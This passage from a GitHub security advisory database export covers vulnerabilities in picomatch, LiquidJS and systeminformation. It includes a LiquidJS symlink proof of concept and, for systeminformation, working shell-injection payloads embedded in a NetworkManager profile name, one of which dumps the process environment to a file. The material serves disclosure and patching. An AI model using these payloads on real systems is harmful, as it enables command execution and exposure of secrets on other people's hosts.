"package": {
"ecosystem": "npm",
"name": "picomatch"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.0.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "picomatch"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.0.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "picomatch"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33672"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-25T21:13:39Z",
"nvd_published_at": "2026-03-26T22:16:30Z",
"severity": "MODERATE"
},
"details": "### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: \u0027a-zA-Z0-9\u0027,\n alpha: \u0027a-zA-Z\u0027,\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch",
"id": "GHSA-3v7f-55p6-f55p",
"modified": "2026-03-27T21:36:24Z",
"published": "2026-03-25T21:13:39Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33672"
},
{
"type": "WEB",
"url": "https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903"
},
{
"type": "PACKAGE",
"url": "https://github.com/micromatch/picomatch"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching"
}
GHSA-56P5-8MHR-2FPH
Vulnerability from github – Published: 2026-04-08 15:03 – Updated: 2026-04-10 21:34Summary
LiquidJS enforces partial and layout root restrictions using the resolved pathname string, but it does not resolve the canonical filesystem path before opening the file. A symlink placed inside an allowed partials or layouts directory can therefore point to a file outside that directory and still be loaded.
Details
For {% include %}, {% render %}, and {% layout %}, LiquidJS checks whether the candidate path is inside the configured partials or layouts roots before reading it. That check is path-based, not realpath-based.
Because of that, a file like partials/link.liquid passes the directory containment check as long as its pathname is under the allowed root. If link.liquid is actually a symlink to a file outside the allowed root, the filesystem follows the symlink when the file is opened and LiquidJS renders the external target.
So the restriction is applied to the path string that was requested, not to the file that is actually read.
This matters in environments where an attacker can place templates or otherwise influence files under a trusted template root, including uploaded themes, extracted archives, mounted content, or repository-controlled template trees.
PoC
const { Liquid } = require('liquidjs');
const fs = require('fs');
fs.rmSync('/tmp/liquid-root', { recursive: true, force: true });
fs.mkdirSync('/tmp/liquid-root', { recursive: true });
fs.writeFileSync('/tmp/secret-outside.liquid', 'SECRET_OUTSIDE');
fs.symlinkSync('/tmp/secret-outside.liquid', '/tmp/liquid-root/link.liquid');
const engine = new Liquid({ root: ['/tmp/liquid-root'] });
engine.parseAndRender('{% render "link.liquid" %}')
.then(console.log);
// SECRET_OUTSIDE
Impact
If an attacker can place or influence symlinks under a trusted partials or layouts directory, they can make LiquidJS read and render files outside the intended template root. In practice this can expose arbitrary readable files reachable through symlink targets.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 10.25.2"
},
"package": {
"ecosystem": "npm",
"name": "liquidjs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.25.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-35525"
],
"database_specific": {
"cwe_ids": [
"CWE-61"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-08T15:03:47Z",
"nvd_published_at": "2026-04-08T20:16:24Z",
"severity": "HIGH"
},
"details": "### Summary\n\nLiquidJS enforces partial and layout root restrictions using the resolved pathname string, but it does not resolve the canonical filesystem path before opening the file. A symlink placed inside an allowed partials or layouts directory can therefore point to a file outside that directory and still be loaded.\n\n### Details\n\nFor `{% include %}`, `{% render %}`, and `{% layout %}`, LiquidJS checks whether the candidate path is inside the configured partials or layouts roots before reading it. That check is path-based, not realpath-based.\n\nBecause of that, a file like `partials/link.liquid` passes the directory containment check as long as its pathname is under the allowed root. If `link.liquid` is actually a symlink to a file outside the allowed root, the filesystem follows the symlink when the file is opened and LiquidJS renders the external target.\n\nSo the restriction is applied to the path string that was requested, not to the file that is actually read.\n\nThis matters in environments where an attacker can place templates or otherwise influence files under a trusted template root, including uploaded themes, extracted archives, mounted content, or repository-controlled template trees.\n\n### PoC\n\n```js\nconst { Liquid } = require(\u0027liquidjs\u0027);\nconst fs = require(\u0027fs\u0027);\n\nfs.rmSync(\u0027/tmp/liquid-root\u0027, { recursive: true, force: true });\nfs.mkdirSync(\u0027/tmp/liquid-root\u0027, { recursive: true });\n\nfs.writeFileSync(\u0027/tmp/secret-outside.liquid\u0027, \u0027SECRET_OUTSIDE\u0027);\nfs.symlinkSync(\u0027/tmp/secret-outside.liquid\u0027, \u0027/tmp/liquid-root/link.liquid\u0027);\n\nconst engine = new Liquid({ root: [\u0027/tmp/liquid-root\u0027] });\n\nengine.parseAndRender(\u0027{% render \"link.liquid\" %}\u0027)\n .then(console.log);\n// SECRET_OUTSIDE\n```\n\n### Impact\n\nIf an attacker can place or influence symlinks under a trusted partials or layouts directory, they can make LiquidJS read and render files outside the intended template root. In practice this can expose arbitrary readable files reachable through symlink targets.",
"id": "GHSA-56p5-8mhr-2fph",
"modified": "2026-04-10T21:34:31Z",
"published": "2026-04-08T15:03:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/harttle/liquidjs/security/advisories/GHSA-56p5-8mhr-2fph"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35525"
},
{
"type": "WEB",
"url": "https://github.com/harttle/liquidjs/pull/867"
},
{
"type": "PACKAGE",
"url": "https://github.com/harttle/liquidjs"
},
{
"type": "WEB",
"url": "https://github.com/harttle/liquidjs/releases/tag/v10.25.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "LiquidJS: Root restriction bypass for partial and layout loading through symlinked templates"
}
GHSA-HVX9-HWR7-WJJ9
Vulnerability from github – Published: 2026-05-13 15:29 – Updated: 2026-06-08 23:53Summary
On Linux, systeminformation is vulnerable to command injection in networkInterfaces() when an active NetworkManager connection profile name contains shell metacharacters.
This is not caused by a caller passing attacker-controlled arguments into networkInterfaces(). The vulnerable value is obtained internally from real nmcli device status output. The library sanitizes the network interface name before using it in shell commands, but it does not apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized connectionName is then interpolated into three shell command strings executed through execSync().
This issue was validated locally against real NetworkManager and real nmcli. Calling only:
require('./lib').networkInterfaces()
was enough to trigger execution. The injected command ran with the privileges of the calling Node.js process.
Affected Component & Versions
Affected component:
lib/network.jsnetworkInterfaces()- Linux NetworkManager /
nmclihandling
Impact & Threat Model
Confirmed impact:
An attacker who can create or rename an active NetworkManager connection profile can execute arbitrary shell commands when a Node.js process using systeminformation calls networkInterfaces().
Confirmed realistic affected deployments include:
- local inventory agents
- monitoring agents
- diagnostics tools
- admin dashboard backends collecting host information
- privileged local desktop or device-management agents
If such a process runs with elevated privileges, the injected command executes with those same elevated privileges.
Confirmed facts:
- The payload was stored as a real NetworkManager connection profile name.
- Real
nmcli device statusreturned the name unchanged. networkInterfaces()parsed that value and reused it in shell commands.- The injected command ran as the calling Node.js process.
- Environment key categories were reachable from the injected process context.
Not claimed:
- No remote exploitation claim is made.
- No
AV:NorAV:Aclaim is made. - No SSID-to-connection-name attack path is claimed.
- File-delivery-only
.nmconnectionimport was not confirmed as a remote or unauthenticated path.
Root Cause Analysis
The root cause is inconsistent trust handling between the Linux interface name and the NetworkManager connection profile name.
The interface name is sanitized before it is embedded into shell commands:
const iface = dev.split(':')[0].trim();
const s = util.isPrototypePolluted() ? '---' : util.sanitizeShellString(iface);
However, the NetworkManager connection name is parsed from command output and later reused without equivalent sanitization:
const connectionNameLines = resultFormat.split(' ').slice(3);
const connectionName = connectionNameLines.join(' ');
return connectionName !== '--' ? connectionName : '';
That is unsafe because NetworkManager profile names can contain shell metacharacters. Quoting the value inside "${connectionName}" does not make it safe. A connection name containing ", $(), ;, backticks, or similar shell syntax can break out of the intended argument context or trigger command substitution.
The vulnerable code executes through execSync(), which invokes a shell for command strings. As a result, interpolating connectionName into the command string creates a command-injection sink.
Exact Code Flow & File Paths
Source: lib/network.js:538-544
function getLinuxIfaceConnectionName(interfaceName) {
const cmd = `nmcli device status 2>/dev/null | grep ${interfaceName}`;
try {
const result = execSync(cmd, util.execOptsLinux).toString();
const resultFormat = result.replace(/\s+/g, ' ').trim();
const connectionNameLines = resultFormat.split(' ').slice(3);
The parsed value is then returned as connectionName.
Trigger: lib/network.js:987-991
lines = execSync(cmd, util.execOptsLinux).toString().split('\n');
const connectionName = getLinuxIfaceConnectionName(ifaceSanitized);
dhcp = getLinuxIfaceDHCPstatus(ifaceSanitized, connectionName, _dhcpNics);
dnsSuffix = getLinuxIfaceDNSsuffix(connectionName);
ieee8021xAuth = getLinuxIfaceIEEE8021xAuth(connectionName);
Sink 1: lib/network.js:620
const cmd = `nmcli connection show "${connectionName}" 2>/dev/null | grep ipv4.method;`;
Sink 2: lib/network.js:660
const cmd = `nmcli connection show "${connectionName}" 2>/dev/null | grep ipv4.dns-search;`;
Sink 3: lib/network.js:676
const cmd = `nmcli connection show "${connectionName}" 2>/dev/null | grep 802-1x.eap;`;
There are three distinct exploitable connectionName sinks.
Proof of Concept (PoC) & Reproduction Steps
The following PoC is harmless and local-only. It uses a dummy NetworkManager connection and writes proof files under /tmp.
Run from the project root:
cd /path/to/systeminformation
Confirm proof files do not already exist:
test -e /tmp/si-nm-id-proof && echo EXISTS || echo NOT_YET
test -e /tmp/si-nm-pwd-proof && echo EXISTS || echo NOT_YET
test -e /tmp/si-nm-env-proof && echo EXISTS || echo NOT_YET
Create a malicious NetworkManager dummy profile:
nmcli connection add type dummy ifname si-nmghsa0 con-name 'si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)'
Assign a documentation-only address so Node’s os.networkInterfaces() sees the dummy interface:
nmcli connection modify 'si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)' \
ipv4.method manual \
ipv4.addresses 192.0.2.253/32 \
ipv6.method disabled
Activate the profile:
nmcli connection up 'si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)'
Confirm real nmcli exposes the malicious connection name unchanged:
nmcli device status | grep si-nmghsa0
Expected relevant output includes the active connection name:
si-nmghsa0 dummy connected si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)
Trigger the vulnerable library path with no attacker-controlled function argument:
node -e "const si=require('./lib'); si.networkInterfaces().then((interfaces)=>{const item=interfaces.find((entry)=>entry.iface==='si-nmghsa0'); console.log('saw_dummy_iface=' + Boolean(item)); if (item)
console.log(JSON.stringify({iface:item.iface, ip4:item.ip4, dhcp:item.dhcp, dnsSuffix:item.dnsSuffix, ieee8021xAuth:item.ieee8021xAuth}));}).catch((e)=>{console.error(e); process.exit(1);});"
Confirm command execution:
test -e /tmp/si-nm-id-proof && echo CONFIRMED || echo FAILED
cat /tmp/si-nm-id-proof
cat /tmp/si-nm-pwd-proof
Inspect environment key categories without printing secret values:
node -e "
const fs=require('fs');
const keys=fs.readFileSync('/tmp/si-nm-env-proof','utf8')
.split(/\n/).map(l=>l.split('=')[0]).filter(Boolean);
const wanted=['PATH','USER','HOME','SHELL','PWD','SSH_AUTH_SOCK','GITHUB_TOKEN','NPM_TOKEN','AWS_ACCESS_KEY_ID'];
console.log('env_key_count='+keys.length);
console.log('present_categories='+wanted.filter(k=>keys.includes(k)).join(','));
"
validated evidence:
saw_dummy_iface=true
uid=1000(smart) gid=1000(smart)
pwd=/home/smart/Downloads/systeminformation-master
env_key_count=74
present_categories=PATH,USER,HOME,SHELL,PWD,SSH_AUTH_SOCK
Local Validation Summary & Aggregate Reachability
Validation was performed against real NetworkManager and real nmcli. The primary proof did not rely on a PATH stub.
Observed behavior:
- The malicious profile was accepted by NetworkManager.
- The active connection name appeared unchanged in
nmcli device status. - Calling only
require('./lib').networkInterfaces()triggered execution. - The proof artifacts were created only after the library call.
- The
idoutput matched the calling Node.js process identity. - The
pwdoutput matched the Node.js process working directory. - The environment proof demonstrated access to process-environment categories without printing secret values.
Aggregate API reachability:
lib/index.js:94:getStaticData()reachesnetwork.networkInterfaces()as part of static data collection.lib/index.js:307:getAllData()reachesgetStaticData()first.
During local validation, an aggregate runtime attempt later hit an unrelated osinfo.js error in that environment. Because of that, aggregate source reachability is confirmed, but aggregate call completion was not used as the primary exploit proof.
Why This Is Not Intended Behavior
networkInterfaces() is documented and expected to return network interface metadata such as interface name, IP addresses, DHCP state, DNS suffix, and IEEE 802.1X status.
The library already shows an intent to protect shell command construction by sanitizing interface names before shell use. The missing sanitization for connectionName is inconsistent with that defensive pattern.
Executing shell commands embedded in a NetworkManager profile name is not a documented feature, not required to return network metadata, and not an expected design tradeoff. This is a command injection vulnerability caused by unsafe shell-string construction.
Recommended Fix
Avoid shell interpolation entirely for NetworkManager calls.
Replace shell command strings with execFileSync() or spawnSync() using argument arrays. For example:
const { execFileSync } = require('child_process');
const output = execFileSync(
'nmcli',
['connection', 'show', connectionName],
util.execOptsLinux
).toString();
Recommended code-level changes:
- Replace
nmcli device status 2>/dev/null | grep ${interfaceName}with argument-array execution and filter rows in JavaScript. - Replace every
nmcli connection show "${connectionName}" | grep ...shell string with argument-array execution. - Parse
ipv4.method,ipv4.dns-search, and802-1x.eapin JavaScript instead of using shellgrep. - Treat NetworkManager profile names as untrusted input even though they originate from local system state.
- Do not rely on quoting or escaping as the main mitigation. Argument-array execution is the correct fix.
Regression Test Ideas
Add Linux-specific tests for NetworkManager connection names containing shell metacharacters.
Suggested malicious connection names:
name$(...)name"; ...; #`name...```name|...name;...
Expected behavior after the fix:
networkInterfaces()completes without executing shell syntax from the connection name.- No marker files or equivalent side effects are produced.
- The function either returns metadata for the interface or safely returns unknown/default values for fields that cannot be queried.
- Tests cover all three current sink helpers:
- DHCP lookup
- DNS suffix lookup
- IEEE 802.1x auth lookup
For unit-level coverage, mock the NetworkManager command wrapper so that nmcli device status returns a connection name containing metacharacters, then assert that subsequent calls use argument arrays rather than shell strings.
Credit request
If you publish an advisory or assign a CVE, please credit me as:
Ali Firas (thesmartshadow) - https://www.smartshadow.dev
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.31.5"
},
"package": {
"ecosystem": "npm",
"name": "systeminformation"
},
"ranges": [
{
"events": [
{
"introduced": "4.17.0"
},
{
"fixed": "5.31.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44724"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-13T15:29:21Z",
"nvd_published_at": "2026-05-27T20:16:37Z",
"severity": "HIGH"
},
"details": "## Summary\n\nOn Linux, `systeminformation` is vulnerable to command injection in `networkInterfaces()` when an **active NetworkManager connection profile name** contains shell metacharacters.\n\nThis is not caused by a caller passing attacker-controlled arguments into `networkInterfaces()`. The vulnerable value is obtained internally from real `nmcli device status` output. The library sanitizes the network interface name before using it in shell commands, but it does **not** apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized `connectionName` is then interpolated into three shell command strings executed through `execSync()`.\n\nThis issue was validated locally against **real NetworkManager** and **real `nmcli`**. Calling only:\n\n```js\nrequire(\u0027./lib\u0027).networkInterfaces()\n```\n\nwas enough to trigger execution. The injected command ran with the privileges of the calling Node.js process.\n\n## Affected Component \u0026 Versions\n\n**Affected component:**\n\n- [`lib/network.js`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js)\n- `networkInterfaces()`\n- Linux NetworkManager / `nmcli` handling\n\n\n## Impact \u0026 Threat Model\n\n**Confirmed impact:**\n\nAn attacker who can create or rename an **active NetworkManager connection profile** can execute arbitrary shell commands when a Node.js process using `systeminformation` calls `networkInterfaces()`.\n\n**Confirmed realistic affected deployments include:**\n\n- local inventory agents\n- monitoring agents\n- diagnostics tools\n- admin dashboard backends collecting host information\n- privileged local desktop or device-management agents\n\nIf such a process runs with elevated privileges, the injected command executes with those same elevated privileges.\n\n**Confirmed facts:**\n\n- The payload was stored as a real NetworkManager connection profile name.\n- Real `nmcli device status` returned the name unchanged.\n- `networkInterfaces()` parsed that value and reused it in shell commands.\n- The injected command ran as the calling Node.js process.\n- Environment key categories were reachable from the injected process context.\n\n**Not claimed:**\n\n- No remote exploitation claim is made.\n- No `AV:N` or `AV:A` claim is made.\n- No SSID-to-connection-name attack path is claimed.\n- File-delivery-only `.nmconnection` import was not confirmed as a remote or unauthenticated path.\n\n## Root Cause Analysis\n\nThe root cause is inconsistent trust handling between the Linux interface name and the NetworkManager connection profile name.\n\nThe interface name is sanitized before it is embedded into shell commands:\n\n```js\nconst iface = dev.split(\u0027:\u0027)[0].trim();\nconst s = util.isPrototypePolluted() ? \u0027---\u0027 : util.sanitizeShellString(iface);\n```\n\nHowever, the NetworkManager connection name is parsed from command output and later reused without equivalent sanitization:\n\n```js\nconst connectionNameLines = resultFormat.split(\u0027 \u0027).slice(3);\nconst connectionName = connectionNameLines.join(\u0027 \u0027);\nreturn connectionName !== \u0027--\u0027 ? connectionName : \u0027\u0027;\n```\n\nThat is unsafe because NetworkManager profile names can contain shell metacharacters. Quoting the value inside `\"${connectionName}\"` does not make it safe. A connection name containing `\"`, `$()`, `;`, backticks, or similar shell syntax can break out of the intended argument context or trigger command substitution.\n\nThe vulnerable code executes through `execSync()`, which invokes a shell for command strings. As a result, interpolating `connectionName` into the command string creates a command-injection sink.\n\n## Exact Code Flow \u0026 File Paths\n\n**Source:** [`lib/network.js:538-544`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js#L538-L544)\n\n```js\nfunction getLinuxIfaceConnectionName(interfaceName) {\n const cmd = `nmcli device status 2\u003e/dev/null | grep ${interfaceName}`;\n\n try {\n const result = execSync(cmd, util.execOptsLinux).toString();\n const resultFormat = result.replace(/\\s+/g, \u0027 \u0027).trim();\n const connectionNameLines = resultFormat.split(\u0027 \u0027).slice(3);\n```\n\nThe parsed value is then returned as `connectionName`.\n\n**Trigger:** [`lib/network.js:987-991`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js#L987-L991)\n\n```js\nlines = execSync(cmd, util.execOptsLinux).toString().split(\u0027\\n\u0027);\nconst connectionName = getLinuxIfaceConnectionName(ifaceSanitized);\ndhcp = getLinuxIfaceDHCPstatus(ifaceSanitized, connectionName, _dhcpNics);\ndnsSuffix = getLinuxIfaceDNSsuffix(connectionName);\nieee8021xAuth = getLinuxIfaceIEEE8021xAuth(connectionName);\n```\n\n**Sink 1:** [`lib/network.js:620`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js#L620-L620)\n\n```js\nconst cmd = `nmcli connection show \"${connectionName}\" 2\u003e/dev/null | grep ipv4.method;`;\n```\n\n**Sink 2:** [`lib/network.js:660`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js#L660-L660)\n\n```js\nconst cmd = `nmcli connection show \"${connectionName}\" 2\u003e/dev/null | grep ipv4.dns-search;`;\n```\n\n**Sink 3:** [`lib/network.js:676`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js#L676-L676)\n\n```js\nconst cmd = `nmcli connection show \"${connectionName}\" 2\u003e/dev/null | grep 802-1x.eap;`;\n```\n\nThere are **three distinct exploitable `connectionName` sinks**.\n\n\n## Proof of Concept (PoC) \u0026 Reproduction Steps\n\nThe following PoC is harmless and local-only. It uses a dummy NetworkManager connection and writes proof files under /tmp.\n\nRun from the project root:\n\n```bash\ncd /path/to/systeminformation\n```\n\nConfirm proof files do not already exist:\n\n```bash\ntest -e /tmp/si-nm-id-proof \u0026\u0026 echo EXISTS || echo NOT_YET\ntest -e /tmp/si-nm-pwd-proof \u0026\u0026 echo EXISTS || echo NOT_YET\ntest -e /tmp/si-nm-env-proof \u0026\u0026 echo EXISTS || echo NOT_YET\n```\n\nCreate a malicious NetworkManager dummy profile:\n\n```bash\nnmcli connection add type dummy ifname si-nmghsa0 con-name \u0027si-ghsa$(id\u003e/tmp/si-nm-id-proof)$(pwd\u003e/tmp/si-nm-pwd-proof)$(env\u003e/tmp/si-nm-env-proof)\u0027\n```\n\nAssign a documentation-only address so Node\u2019s os.networkInterfaces() sees the dummy interface:\n\n```bash\nnmcli connection modify \u0027si-ghsa$(id\u003e/tmp/si-nm-id-proof)$(pwd\u003e/tmp/si-nm-pwd-proof)$(env\u003e/tmp/si-nm-env-proof)\u0027 \\\n ipv4.method manual \\\n ipv4.addresses 192.0.2.253/32 \\\n ipv6.method disabled\n```\n\nActivate the profile:\n\n```bash\nnmcli connection up \u0027si-ghsa$(id\u003e/tmp/si-nm-id-proof)$(pwd\u003e/tmp/si-nm-pwd-proof)$(env\u003e/tmp/si-nm-env-proof)\u0027\n```\n\nConfirm real nmcli exposes the malicious connection name unchanged:\n\n```bash\nnmcli device status | grep si-nmghsa0\n```\n\nExpected relevant output includes the active connection name:\n\n```text\nsi-nmghsa0 dummy connected si-ghsa$(id\u003e/tmp/si-nm-id-proof)$(pwd\u003e/tmp/si-nm-pwd-proof)$(env\u003e/tmp/si-nm-env-proof)\n```\n\nTrigger the vulnerable library path with no attacker-controlled function argument:\n\n```bash\nnode -e \"const si=require(\u0027./lib\u0027); si.networkInterfaces().then((interfaces)=\u003e{const item=interfaces.find((entry)=\u003eentry.iface===\u0027si-nmghsa0\u0027); console.log(\u0027saw_dummy_iface=\u0027 + Boolean(item)); if (item)\nconsole.log(JSON.stringify({iface:item.iface, ip4:item.ip4, dhcp:item.dhcp, dnsSuffix:item.dnsSuffix, ieee8021xAuth:item.ieee8021xAuth}));}).catch((e)=\u003e{console.error(e); process.exit(1);});\"\n```\n\nConfirm command execution:\n\n```bash\ntest -e /tmp/si-nm-id-proof \u0026\u0026 echo CONFIRMED || echo FAILED\ncat /tmp/si-nm-id-proof\ncat /tmp/si-nm-pwd-proof\n```\n\nInspect environment key categories without printing secret values:\n\n```bash\nnode -e \"\nconst fs=require(\u0027fs\u0027);\nconst keys=fs.readFileSync(\u0027/tmp/si-nm-env-proof\u0027,\u0027utf8\u0027)\n .split(/\\n/).map(l=\u003el.split(\u0027=\u0027)[0]).filter(Boolean);\nconst wanted=[\u0027PATH\u0027,\u0027USER\u0027,\u0027HOME\u0027,\u0027SHELL\u0027,\u0027PWD\u0027,\u0027SSH_AUTH_SOCK\u0027,\u0027GITHUB_TOKEN\u0027,\u0027NPM_TOKEN\u0027,\u0027AWS_ACCESS_KEY_ID\u0027];\nconsole.log(\u0027env_key_count=\u0027+keys.length);\nconsole.log(\u0027present_categories=\u0027+wanted.filter(k=\u003ekeys.includes(k)).join(\u0027,\u0027));\n\"\n```\n\nvalidated evidence:\n\n```text\nsaw_dummy_iface=true\nuid=1000(smart) gid=1000(smart)\npwd=/home/smart/Downloads/systeminformation-master\nenv_key_count=74\npresent_categories=PATH,USER,HOME,SHELL,PWD,SSH_AUTH_SOCK\n```\n\n## Local Validation Summary \u0026 Aggregate Reachability\n\nValidation was performed against **real NetworkManager** and **real `nmcli`**. The primary proof did not rely on a PATH stub.\n\n**Observed behavior:**\n\n- The malicious profile was accepted by NetworkManager.\n- The active connection name appeared unchanged in `nmcli device status`.\n- Calling only `require(\u0027./lib\u0027).networkInterfaces()` triggered execution.\n- The proof artifacts were created only after the library call.\n- The `id` output matched the calling Node.js process identity.\n- The `pwd` output matched the Node.js process working directory.\n- The environment proof demonstrated access to process-environment categories without printing secret values.\n\n**Aggregate API reachability:**\n\n- [`lib/index.js:94`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/index.js#L94-L94): `getStaticData()` reaches `network.networkInterfaces()` as part of static data collection.\n- [`lib/index.js:307`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/index.js#L307-L307): `getAllData()` reaches `getStaticData()` first.\n\nDuring local validation, an aggregate runtime attempt later hit an unrelated `osinfo.js` error in that environment. Because of that, aggregate source reachability is confirmed, but aggregate call completion was **not** used as the primary exploit proof.\n\n## Why This Is Not Intended Behavior\n\n`networkInterfaces()` is documented and expected to return network interface metadata such as interface name, IP addresses, DHCP state, DNS suffix, and IEEE 802.1X status.\n\nThe library already shows an intent to protect shell command construction by sanitizing interface names before shell use. The missing sanitization for `connectionName` is inconsistent with that defensive pattern.\n\nExecuting shell commands embedded in a NetworkManager profile name is not a documented feature, not required to return network metadata, and not an expected design tradeoff. This is a command injection vulnerability caused by unsafe shell-string construction.\n\n## Recommended Fix\n\nAvoid shell interpolation entirely for NetworkManager calls.\n\nReplace shell command strings with `execFileSync()` or `spawnSync()` using argument arrays. For example:\n\n```js\nconst { execFileSync } = require(\u0027child_process\u0027);\n\nconst output = execFileSync(\n \u0027nmcli\u0027,\n [\u0027connection\u0027, \u0027show\u0027, connectionName],\n util.execOptsLinux\n).toString();\n```\n\n**Recommended code-level changes:**\n\n- Replace `nmcli device status 2\u003e/dev/null | grep ${interfaceName}` with argument-array execution and filter rows in JavaScript.\n- Replace every `nmcli connection show \"${connectionName}\" | grep ...` shell string with argument-array execution.\n- Parse `ipv4.method`, `ipv4.dns-search`, and `802-1x.eap` in JavaScript instead of using shell `grep`.\n- Treat NetworkManager profile names as untrusted input even though they originate from local system state.\n- Do not rely on quoting or escaping as the main mitigation. Argument-array execution is the correct fix.\n\n## Regression Test Ideas\n\nAdd Linux-specific tests for NetworkManager connection names containing shell metacharacters.\n\n**Suggested malicious connection names:**\n\n- `name$(...)`\n- `name\"; ...; #`\n- ``name`...``` \n- `name|...`\n- `name;...`\n\n**Expected behavior after the fix:**\n\n- `networkInterfaces()` completes without executing shell syntax from the connection name.\n- No marker files or equivalent side effects are produced.\n- The function either returns metadata for the interface or safely returns unknown/default values for fields that cannot be queried.\n- Tests cover all three current sink helpers:\n - DHCP lookup\n - DNS suffix lookup\n - IEEE 802.1x auth lookup\n\nFor unit-level coverage, mock the NetworkManager command wrapper so that `nmcli device status` returns a connection name containing metacharacters, then assert that subsequent calls use argument arrays rather than shell strings.\n\n## Credit request\nIf you publish an advisory or assign a CVE, please credit me as:\n\nAli Firas (thesmartshadow) - https://www.smartshadow.dev",
"id": "GHSA-hvx9-hwr7-wjj9",
"modified": "2026-06-08T23:53:59Z",
"published": "2026-05-13T15:29:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44724"
},
{
"type": "PACKAGE",
"url": "https://github.com/sebhildebrandt/systeminformation"
},
{
"type": "WEB",
"url": "https://github.com/sebhildebrandt/systeminformation/releases/tag/v5.31.6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Systeminformation vulnerable to Linux command injection in networkInterfaces() via unsanitized NetworkManager connection profile name"
}
GHSA-5M6Q-G25R-MVWX
Vulnerability from github – Published: 2026-03-26 21:57 – Updated: 2026-03-27 21:50Summary
